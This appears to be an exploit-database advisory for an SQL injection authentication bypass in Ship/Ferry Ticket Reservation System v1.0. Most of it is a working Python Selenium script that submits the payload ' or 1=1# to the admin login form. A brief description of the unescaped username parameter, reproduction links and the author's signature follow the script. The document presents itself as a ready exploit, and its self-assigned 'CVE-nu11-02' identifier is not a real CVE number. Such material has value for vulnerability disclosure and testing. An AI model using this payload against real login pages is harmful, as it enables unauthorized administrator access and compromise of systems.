### Exploit Title: Ship Ferry Ticket Reservation System v1.0 SQL-Injection-Bypass-Authentication in /ship_ticketing/classes/Login.php. ### Author: nu11secur1ty ### Testing and Debugging: nu11secur1ty ### Date: 08.30.2021 ### Vendor: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html ### Link: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html ### CVE: CVE-nu11-02 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug and Developement: @nu11secur1ty # CVE-nu11-02 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://localhost/ship_ticketing/admin/login.php" #enter your login username username="nu11secur1ty' or 1=1#" #enter your login password password="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") print("The payload for CVE-nu11-02 is deployed...\n") except Exception: #### This exception occurs if the elements are not found on the webpage. print("Some error occured :(") ------------------------------------------------------------------ ### Remote vulnerable link execution: http://localhost/ship_ticketing/admin/login.php ### Description: The Ship/Ferry Ticket Reservation System v1.0 in the application /ship_ticketing/classes/Login.php from SQL-Injection-Bypass-Authentication m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account. ### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CVE-nu11-02 ### Proof: https://streamable.com/h65olk ### BR nu11secur1ty -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty